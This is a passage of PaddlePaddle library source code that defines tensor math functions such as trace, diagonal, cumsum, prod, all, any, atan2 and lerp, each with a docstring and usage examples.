fmax = float(np.finfo(np.float32).max)
if isinstance(min, Variable):
min = min.numpy().item(0)
if isinstance(max, Variable):
max = max.numpy().item(0)
min = fmin if min is None else min
max = fmax if max is None else max
return _C_ops.clip_(x, "min", min, "max", max)
def trace(x, offset=0, axis1=0, axis2=1, name=None):
"""
**trace**
This OP computes the sum along diagonals of the input tensor x.
If ``x`` is 2D, returns the sum of diagonal.
If ``x`` has larger dimensions, then returns an tensor of diagonals sum, diagonals be taken from
the 2D planes specified by axis1 and axis2. By default, the 2D planes formed by the first and second axes
of the input tensor x.
The argument ``offset`` determines where diagonals are taken from input tensor x:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
- Note that if offset is out of input's shape indicated by axis1 and axis2, 0 will be returned.
Args:
x(Tensor): The input tensor x. Must be at least 2-dimensional. The input data type should be float32, float64, int32, int64.
offset(int, optional): Which diagonals in input tensor x will be taken. Default: 0 (main diagonals).
axis1(int, optional): The first axis with respect to take diagonal. Default: 0.
axis2(int, optional): The second axis with respect to take diagonal. Default: 1.
name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None.
Returns:
Tensor: the output data type is the same as input data type.
Examples:
.. code-block:: python
import paddle
case1 = paddle.randn([2, 3])
case2 = paddle.randn([3, 10, 10])
case3 = paddle.randn([3, 10, 5, 10])
data1 = paddle.trace(case1) # data1.shape = [1]
data2 = paddle.trace(case2, offset=1, axis1=1, axis2=2) # data2.shape = [3]
data3 = paddle.trace(case3, offset=-3, axis1=1, axis2=-1) # data2.shape = [3, 5]
"""
def __check_input(input, offset, dim1, dim2):
check_dtype(x.dtype, 'Input',
['int32', 'int64', 'float16', 'float32', 'float64'],
'trace')
input_shape = list(x.shape)
assert len(input_shape) >= 2, \
"The x must be at least 2-dimensional, " \
"But received Input x's dimensional: %s.\n" % \
len(input_shape)
axis1_ = axis1 if axis1 >= 0 else len(input_shape) + axis1
axis2_ = axis2 if axis2 >= 0 else len(input_shape) + axis2
assert ((0 <= axis1_) and (axis1_ < len(input_shape))), \
"The argument axis1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis1)
assert ((0 <= axis2_) and (axis2_ < len(input_shape))), \
"The argument axis2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis2)
assert axis1_ != axis2_, \
"axis1 and axis2 cannot be the same axis." \
"But received axis1 = %d, axis2 = %d\n"%(axis1, axis2)
__check_input(input, offset, axis1, axis2)
if in_dygraph_mode():
return _C_ops.trace(x, 'offset', offset, 'axis1', axis1, 'axis2', axis2)
inputs = {'Input': [x]}
attrs = {'offset': offset, 'axis1': axis1, 'axis2': axis2}
helper = LayerHelper('trace', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='trace',
inputs={'Input': [x]},
attrs={'offset': offset,
'axis1': axis1,
'axis2': axis2},
outputs={'Out': [out]})
return out
def diagonal(x, offset=0, axis1=0, axis2=1, name=None):
"""
This OP computes the diagonals of the input tensor x.
If ``x`` is 2D, returns the diagonal.
If ``x`` has larger dimensions, diagonals be taken from the 2D planes specified by axis1 and axis2.
By default, the 2D planes formed by the first and second axis of the input tensor x.
The argument ``offset`` determines where diagonals are taken from input tensor x:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
Args:
x(Tensor): The input tensor x. Must be at least 2-dimensional. The input data type should be bool, int32, int64, float16, float32, float64.
offset(int, optional): Which diagonals in input tensor x will be taken. Default: 0 (main diagonals).
axis1(int, optional): The first axis with respect to take diagonal. Default: 0.
axis2(int, optional): The second axis with respect to take diagonal. Default: 1.
name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None.
Returns:
Tensor: a partial view of input tensor in specify two dimensions, the output data type is the same as input data type.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([2,2,3],'float32')
print(x)
# Tensor(shape=[2, 2, 3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[[0.45661032, 0.03751532, 0.90191704],
# [0.43760979, 0.86177313, 0.65221709]],
# [[0.17020577, 0.00259554, 0.28954273],
# [0.51795638, 0.27325270, 0.18117726]]])
out1 = paddle.diagonal(x)
print(out1)
#Tensor(shape=[3, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.51795638],
# [0.03751532, 0.27325270],
# [0.90191704, 0.18117726]])
out2 = paddle.diagonal(x, offset=0, axis1=2, axis2=1)
print(out2)
#Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.86177313],
# [0.17020577, 0.27325270]])
out3 = paddle.diagonal(x, offset=1, axis1=0, axis2=1)
print(out3)
#Tensor(shape=[3, 1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.43760979],
# [0.86177313],
# [0.65221709]])
out4 = paddle.diagonal(x, offset=0, axis1=1, axis2=2)
print(out4)
#Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.86177313],
# [0.17020577, 0.27325270]])
"""
if in_dygraph_mode():
return _C_ops.diagonal(x, 'offset', offset, 'axis1', axis1, 'axis2', axis2)
def __check_input(input, offset, dim1, dim2):
check_dtype(x.dtype, 'Input',
['bool', 'int32', 'int64', 'float16', 'float32', 'float64'],
'diagonal')
input_shape = list(x.shape)
assert len(input_shape) >= 2, \
"The x must be at least 2-dimensional, " \
"But received Input x's dimensional: %s.\n" % \
len(input_shape)
axis1_ = axis1 if axis1 >= 0 else len(input_shape) + axis1
axis2_ = axis2 if axis2 >= 0 else len(input_shape) + axis2
assert axis1_ < len(input_shape), \
"The argument axis1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis1)
assert axis2_ < len(input_shape), \
"The argument axis2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis2)
assert axis1_ != axis2_, \
"axis1 and axis2 cannot be the same axis." \
"But received axis1 = %d, axis2 = %d\n"%(axis1, axis2)
__check_input(input, offset, axis1, axis2)
helper = LayerHelper('diagonal', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='diagonal',
inputs={'Input': [x]},
attrs={'offset': offset,
'axis1': axis1,
'axis2': axis2},
outputs={'Out': [out]})
return out
@templatedoc(op_type="kron")
def kron(x, y, name=None):
"""
${comment}
Args:
x (Tensor): the fist operand of kron op, data type: float16, float32,
float64, int32 or int64.
y (Tensor): the second operand of kron op, data type: float16,
float32, float64, int32 or int64. Its data type should be the same
with x.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output of kron op, data type: float16, float32, float64, int32 or int64. Its data is the same with x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2], [3, 4]], dtype='int64')
y = paddle.to_tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], dtype='int64')
out = paddle.kron(x, y)
print(out)
# [[1, 2, 3, 2, 4, 6],
# [ 4, 5, 6, 8, 10, 12],
# [ 7, 8, 9, 14, 16, 18],
# [ 3, 6, 9, 4, 8, 12],
# [12, 15, 18, 16, 20, 24],
# [21, 24, 27, 28, 32, 36]])
"""
if in_dygraph_mode():
return _C_ops.kron(x, y)
helper = LayerHelper('kron', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'kron')
check_variable_and_dtype(y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64'], 'kron')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type="kron", inputs={"X": x, "Y": y}, outputs={"Out": out})
return out
def cumsum(x, axis=None, dtype=None, name=None):
"""
The cumulative sum of the elements along a given axis.
**Note**:
The first element of the result is the same of the first element of the input.
Args:
x (Tensor): The input tensor needed to be cumsumed.
axis (int, optional): The dimension to accumulate along. -1 means the last dimension. The default (None) is to compute the cumsum over the flattened array.
dtype (str, optional): The data type of the output tensor, can be float32, float64, int32, int64. If specified, the input tensor is casted to dtype before the operation is performed. This is useful for preventing data type overflows. The default value is None.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the result of cumsum operator.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(12)
data = paddle.reshape(data, (3, 4))
y = paddle.cumsum(data)
# [ 0 1 3 6 10 15 21 28 36 45 55 66]
y = paddle.cumsum(data, axis=0)
# [[ 0 1 2 3]
# [ 4 6 8 10]
# [12 15 18 21]]
y = paddle.cumsum(data, axis=-1)
# [[ 0 1 3 6]
# [ 4 9 15 22]
# [ 8 17 27 38]]
y = paddle.cumsum(data, dtype='float64')
print(y.dtype)
# VarType.FP64
"""
if axis is None:
flatten = True
else:
flatten = False
if dtype is not None and x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
if in_dygraph_mode():
if axis is None:
return _C_ops.cumsum(x, 'flatten', flatten)
else:
return _C_ops.cumsum(x, 'axis', axis, 'flatten', flatten)
check_type(x, 'x', (Variable), 'cumsum')
locals_var = locals().copy()
kwargs = dict()
for name, val in locals_var.items():
if val is not None:
kwargs[name] = val
_cum_sum_ = generate_layer_fn('cumsum')
return _cum_sum_(**kwargs)
def cumprod(x, dim=None, dtype=None, name=None):
"""
Compute the cumulative product of the input tensor x along a given dimension dim.
**Note**:
The first element of the result is the same as the first element of the input.
Args:
x (Tensor): the input tensor need to be cumproded.
dim (int): the dimension along which the input tensor will be accumulated. It need to be in the range of [-x.rank, x.rank), where x.rank means the dimensions of the input tensor x and -1 means the last dimension.
dtype (str, optional): The data type of the output tensor, can be float32, float64, int32, int64, complex64, complex128. If specified, the input tensor is casted to dtype before the operation is performed. This is useful for preventing data type overflows. The default value is None.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the result of cumprod operator.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(12)
data = paddle.reshape(data, (3, 4))
# [[ 0 1 2 3 ]
# [ 4 5 6 7 ]
# [ 8 9 10 11]]
y = paddle.cumprod(data, dim=0)
# [[ 0 1 2 3]
# [ 0 5 12 21]
# [ 0 45 120 231]]
y = paddle.cumprod(data, dim=-1)
# [[ 0 0 0 0]
# [ 4 20 120 840]
# [ 8 72 720 7920]]
y = paddle.cumprod(data, dim=1, dtype='float64')
# [[ 0. 0. 0. 0.]
# [ 4. 20. 120. 840.]
# [ 8. 72. 720. 7920.]]
print(y.dtype)
# paddle.float64
"""
if dtype is not None and x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
if in_dygraph_mode():
return _C_ops.cumprod(x, 'dim', dim)
check_variable_and_dtype(x, "x", ['complex64', 'complex128', 'float32', 'float64', 'int32', 'int64'], 'cumprod')
check_type(dim, 'dim', int, 'cumprod')
helper = LayerHelper('cumprod', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='cumprod', inputs={'X': x}, outputs={'Out': out}, attrs={'dim': dim})
return out
def isfinite(x, name=None):
"""
Return whether every element of input tensor is finite number or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
`Tensor`, the bool result which shows every element of `x` whether it is finite number or not.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isfinite(x)
print(out) # [False True True False True False False]
"""
if in_dygraph_mode():
return _C_ops.isfinite_v2(x)
helper = LayerHelper("isfinite_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isfinite')
out = helper.create_variable_for_type_inference('bool')
helper.append_op(type="isfinite_v2", inputs={"X": x}, outputs={"Out": out})
return out
def isinf(x, name=None):
"""
Return whether every element of input tensor is `+/-INF` or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
`Tensor`, the bool result which shows every element of `x` whether it is `+/-INF` or not.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isinf(x)
print(out) # [ True False False True False False False]
"""
if in_dygraph_mode():
return _C_ops.isinf_v2(x)
helper = LayerHelper("isinf_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isinf')
out = helper.create_variable_for_type_inference(dtype='bool')
helper.append_op(type="isinf_v2", inputs={"X": x}, outputs={"Out": out})
return out
def isnan(x, name=None):
"""
Return whether every element of input tensor is `NaN` or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
`Tensor`, the bool result which shows every element of `x` whether it is `NaN` or not.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isnan(x)
print(out) # [False False False False False True True]
"""
if in_dygraph_mode():
return _C_ops.isnan_v2(x)
helper = LayerHelper("isnan_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isnan')
out = helper.create_variable_for_type_inference(dtype='bool')
helper.append_op(type="isnan_v2", inputs={"X": x}, outputs={"Out": out})
return out
def prod(x, axis=None, keepdim=False, dtype=None, name=None):
"""
Compute the product of tensor elements over the given axis.
Args:
x(Tensor): The input tensor, its data type should be float32, float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the product is computed. If :attr:`None`,
multiply all elements of `x` and return a Tensor with a single element,
otherwise must be in the range :math:`[-x.ndim, x.ndim)`. If :math:`axis[i]<0`,
the axis to reduce is :math:`x.ndim + axis[i]`. Default is None.
dtype(str|np.dtype, optional): The desired date type of returned tensor, can be float32, float64,
int32, int64. If specified, the input tensor is casted to dtype before operator performed.
This is very useful for avoiding data type overflows. The default value is None, the dtype
of output is the same as input Tensor `x`.
keepdim(bool, optional): Whether to reserve the reduced dimension in the output Tensor. The result
tensor will have one fewer dimension than the input unless `keepdim` is true. Default is False.
name(string, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor, result of product on the specified dim of input tensor.
Raises:
ValueError: The :attr:`dtype` must be float32, float64, int32 or int64.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
out1 = paddle.prod(x)
# [0.0002268]
out2 = paddle.prod(x, -1)
# [0.027 0.0084]
out3 = paddle.prod(x, 0)
# [0.02 0.06 0.3 0.63]
out4 = paddle.prod(x, 0, keepdim=True)
# [[0.02 0.06 0.3 0.63]]
out5 = paddle.prod(x, 0, dtype='int64')
# [0 0 0 0]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
out6 = paddle.prod(y, [0, 1])
# [105. 384.]
out7 = paddle.prod(y, (1, 2))
# [ 24. 1680.]
"""
if dtype is not None:
check_dtype(dtype, 'dtype', ['float32', 'float64', 'int32', 'int64'], 'prod')
if x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
return layers.reduce_prod(input=x, dim=axis, keep_dim=keepdim, name=name)
def sign(x, name=None):
"""
This OP returns sign of every element in `x`: 1 for positive, -1 for negative and 0 for zero.
Args:
x(Tensor): The input tensor. The data type can be float16, float32 or float64.
name (str, optional): The default value is None. Normally there is no need for user to
set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The output sign tensor with identical shape and data type to the input :attr:`x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([3.0, 0.0, -2.0, 1.7], dtype='float32')
out = paddle.sign(x=x)
print(out) # [1.0, 0.0, -1.0, 1.0]
"""
if in_dygraph_mode():
return _C_ops.sign(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'sign')
helper = LayerHelper("sign", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='sign', inputs={'X': [x]}, outputs={'Out': [out]})
return out
def tanh(x, name=None):
r"""
Tanh Activation Operator.
.. math::
out = \\frac{e^{x} - e^{-x}}{e^{x} + e^{-x}}
Args:
x (Tensor): Input of Tanh operator, an N-D Tensor, with data type float32, float64 or float16.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Output of Tanh operator, a Tensor with same data type and shape as input.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-0.4, -0.2, 0.1, 0.3])
out = paddle.tanh(x)
print(out)
# [-0.37994896 -0.19737532 0.09966799 0.29131261]
"""
if in_dygraph_mode():
return _C_ops.tanh(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'tanh')
check_type(x, 'x', (Variable), 'tanh')
helper = LayerHelper('tanh', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='tanh', inputs={'X': x}, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def tanh_(x, name=None):
r"""
Inplace version of ``tanh`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_tanh`.
"""
return _C_ops.tanh_(x)
def increment(x, value=1.0, name=None):
"""
The OP is usually used for control flow to increment the data of :attr:`x` by an amount :attr:`value`.
Notice that the number of elements in :attr:`x` must be equal to 1.
Args:
x (Tensor): A tensor that must always contain only one element, its data type supports float32, float64, int32 and int64.
value(float, optional): The amount to increment the data of :attr:`x`. Default: 1.0.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the elementwise-incremented tensor with the same shape and data type as :attr:`x`.
Examples:
.. code-block:: python
import paddle
data = paddle.zeros(shape=[1], dtype='float32')
counter = paddle.increment(data)
# [1.]
"""
if in_dygraph_mode():
return _C_ops.increment(x, 'step', value)
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'increment')
helper = LayerHelper("increment", **locals())
helper.append_op(
type='increment',
inputs={'X': [x]},
outputs={'Out': [x]},
attrs={'step': float(value)})
return x
def all(x, axis=None, keepdim=False, name=None):
"""
Computes the the ``logical and`` of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the input data type should be `bool`.
axis (int|list|tuple, optional): The dimensions along which the ``logical and`` is compute. If
:attr:`None`, and all elements of :attr:`x` and return a
Tensor with a single element, otherwise must be in the
range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
the dimension to reduce is :math:`rank + axis[i]`.
keepdim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result Tensor will have one fewer dimension
than the :attr:`x` unless :attr:`keepdim` is true, default
value is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: Results the ``logical and`` on the specified axis of input Tensor `x`, it's data type is bool.
Raises:
ValueError: If the data type of `x` is not bool.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
import numpy as np
# x is a bool Tensor with following elements:
# [[True, False]
# [True, True]]
x = paddle.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
print(x)
x = paddle.cast(x, 'bool')
# out1 should be [False]
out1 = paddle.all(x) # [False]
print(out1)
# out2 should be [True, False]
out2 = paddle.all(x, axis=0) # [True, False]
print(out2)
# keep_dim=False, out3 should be [False, True], out.shape should be (2,)
out3 = paddle.all(x, axis=-1) # [False, True]
print(out3)
# keep_dim=True, out4 should be [[False], [True]], out.shape should be (2,1)
out4 = paddle.all(x, axis=1, keepdim=True)
out4 = paddle.cast(out4, 'int32') # [[False], [True]]
print(out4)
"""
if axis is not None and not isinstance(axis, (list, tuple)):
axis = [axis]
if not axis:
reduce_all_flag = True
else:
if len(axis) == len(x.shape):
reduce_all_flag = True
else:
reduce_all_flag = False
if in_dygraph_mode():
axis = axis if axis != None and axis != [] else [0]
return _C_ops.reduce_all(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
'dim': axis if axis != None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
check_variable_and_dtype(x, 'x', ['bool'], 'all')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'all')
helper = LayerHelper('all', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_all',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
def any(x, axis=None, keepdim=False, name=None):
"""
Computes the the ``logical or`` of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the input data type should be `bool`.
axis (int|list|tuple, optional): The dimensions along which the ``logical or`` is compute. If
:attr:`None`, and all elements of :attr:`x` and return a
Tensor with a single element, otherwise must be in the
range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
the dimension to reduce is :math:`rank + axis[i]`.
keepdim (bool, optional): Whether to reserve the reduced dimension in the
output Tensor. The result Tensor will have one fewer dimension
than the :attr:`x` unless :attr:`keepdim` is true, default
value is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: Results the ``logical or`` on the specified axis of input Tensor `x`, it's data type is bool.
Raises:
ValueError: If the data type of `x` is not bool.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
import numpy as np
# x is a bool Tensor with following elements:
# [[True, False]
# [False, False]]
x = paddle.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
print(x)
x = paddle.cast(x, 'bool')
# out1 should be [True]
out1 = paddle.any(x) # [True]
print(out1)
# out2 should be [True, True]
out2 = paddle.any(x, axis=0) # [True, True]
print(out2)
# keep_dim=False, out3 should be [True, True], out.shape should be (2,)
out3 = paddle.any(x, axis=-1) # [True, True]
print(out3)
# keep_dim=True, result should be [[True], [True]], out.shape should be (2,1)
out4 = paddle.any(x, axis=1, keepdim=True)
out4 = paddle.cast(out4, 'int32') # [[True], [True]]
print(out4)
"""
if axis is not None and not isinstance(axis, (list, tuple)):
axis = [axis]
if not axis:
reduce_all_flag = True
else:
if len(axis) == len(x.shape):
reduce_all_flag = True
else:
reduce_all_flag = False
if in_dygraph_mode():
axis = axis if axis != None and axis != [] else [0]
return _C_ops.reduce_any(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
'dim': axis if axis != None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
check_variable_and_dtype(x, 'x', ['bool'], 'any')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'any')
helper = LayerHelper('any', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_any',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
def broadcast_shape(x_shape, y_shape):
"""
The function returns the shape of doing operation with broadcasting on tensors of x_shape and y_shape, please refer to :ref:`user_guide_broadcasting` for more details.
Args:
x_shape (list[int]|tuple[int]): A shape of tensor.
y_shape (list[int]|tuple[int]): A shape of tensor.
Returns:
list[int], the result shape.
Examples:
.. code-block:: python
import paddle
shape = paddle.broadcast_shape([2, 1, 3], [1, 3, 1])
# [2, 3, 3]
# shape = paddle.broadcast_shape([2, 1, 3], [3, 3, 1])
# ValueError (terminated with error message).
"""
return core.broadcast_shape(x_shape, y_shape)
def conj(x, name=None):
r"""
This function computes the conjugate of the Tensor elementwisely.
Args:
x (Tensor): The input tensor which hold the complex numbers.
Optional data types are: complex64, complex128, float32, float64, int32 or int64.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
out (Tensor): The conjugate of input. The shape and data type is the same with input.
If the elements of tensor is real type such as float32, float64, int32 or int64, the out is the same with input.
Examples:
.. code-block:: python
import paddle
data=paddle.to_tensor([[1+1j, 2+2j, 3+3j], [4+4j, 5+5j, 6+6j]])
#Tensor(shape=[2, 3], dtype=complex64, place=CUDAPlace(0), stop_gradient=True,
# [[(1+1j), (2+2j), (3+3j)],
# [(4+4j), (5+5j), (6+6j)]])
conj_data=paddle.conj(data)
#Tensor(shape=[2, 3], dtype=complex64, place=CUDAPlace(0), stop_gradient=True,
# [[(1-1j), (2-2j), (3-3j)],
# [(4-4j), (5-5j), (6-6j)]])
"""
if in_dygraph_mode():
return _C_ops.conj(x)
check_variable_and_dtype(x, "x", ['complex64', 'complex128', 'float32', 'float64', 'int32', 'int64'], 'conj')
helper = LayerHelper('conj', **locals())
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
helper.append_op(type='conj', inputs={'X': x}, outputs={'Out': [out]})
return out
def digamma(x, name=None):
r"""
Calculates the digamma of the given input tensor, element-wise.
.. math::
Out = \Psi(x) = \frac{ \Gamma^{'}(x) }{ \Gamma(x) }
Args:
x (Tensor): Input Tensor. Must be one of the following types: float32, float64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the digamma of the input Tensor, the shape and data type is the same with input.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 1.5], [0, -2.2]], dtype='float32')
res = paddle.digamma(data)
print(res)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[-0.57721591, 0.03648996],
# [ nan , 5.32286835]])
"""
if in_dygraph_mode():
return _C_ops.digamma(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'digamma')
helper = LayerHelper('digamma', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='digamma', inputs={'X': x}, outputs={'Out': out})
return out
def neg(x, name=None):
"""
This function computes the negative of the Tensor elementwisely.
Args:
x (Tensor): Input of neg operator, an N-D Tensor, with data type float32, float64, int8, int16, int32, or int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): The negative of input Tensor. The shape and data type are the same with input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-0.4, -0.2, 0.1, 0.3])
out = paddle.neg(x)
print(out)
# [0.4 0.2 -0.1 -0.3]
"""
return layers.scale(x, scale=-1.0, bias=0.0, bias_after_scale=True, act=None, name=name)
def atan2(x, y, name=None):
r"""
Element-wise arctangent of x/y with consideration of the quadrant.
Equation:
.. math::
atan2(x,y)=\left\{\begin{matrix}
& tan^{-1}(\frac{x}{y}) & y > 0 \\
& tan^{-1}(\frac{x}{y}) + \pi & x>=0, y < 0 \\
& tan^{-1}(\frac{x}{y}) - \pi & x<0, y < 0 \\
& +\frac{\pi}{2} & x>0, y = 0 \\
& -\frac{\pi}{2} & x<0, y = 0 \\
&\text{undefined} & x=0, y = 0
\end{matrix}\right.
Args:
x (Tensor): An N-D Tensor, the data type is int32, int64, float16, float32, float64.
y (Tensor): An N-D Tensor, must have the same type as `x`.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type is the same with input (The output data type is float64 when the input data type is int).
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-1, +1, +1, -1]).astype('float32')
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-1, 1, 1, -1])
y = paddle.to_tensor([-1, -1, +1, +1]).astype('float32')
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-1, -1, 1, 1])
out = paddle.atan2(x, y)
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-2.35619450, 2.35619450, 0.78539819, -0.78539819])
"""
if in_dygraph_mode():
return _C_ops.atan2(x, y)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float16', 'float32', 'float64'], 'atan2')
check_variable_and_dtype(y, 'y', ['int32', 'int64', 'float16', 'float32', 'float64'], 'atan2')
helper = LayerHelper('atan2', **locals())
inputs = {'X1' : x, 'X2' : y}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='atan2', inputs=inputs, outputs={'Out': out})
return out
def lerp(x, y, weight, name=None):
r"""
Does a linear interpolation between x and y based on weight.
Equation:
.. math::
lerp(x, y, weight) = x + weight * (y - x).
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64.
y (Tensor): An N-D Tensor, the data type is float32, float64.
weight (float|Tensor): the weight for the interpolation formula.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type is the same with input.
Example:
.. code-block:: python
import paddle
x = paddle.arange(1., 5., dtype='float32')
y = paddle.empty([4], dtype='float32')
y.fill_(10.)
out = paddle.lerp(start, end, 0.5)
# out: [5.5., 6., 6.5, 7.]
"""
if in_dygraph_mode():
check_type(weight, 'weight', (float, paddle.Tensor, Variable), 'lerp')
if isinstance(weight, float):
weight = paddle.to_tensor(weight, dtype=x.dtype)
return _C_ops.lerp(x, y, weight)
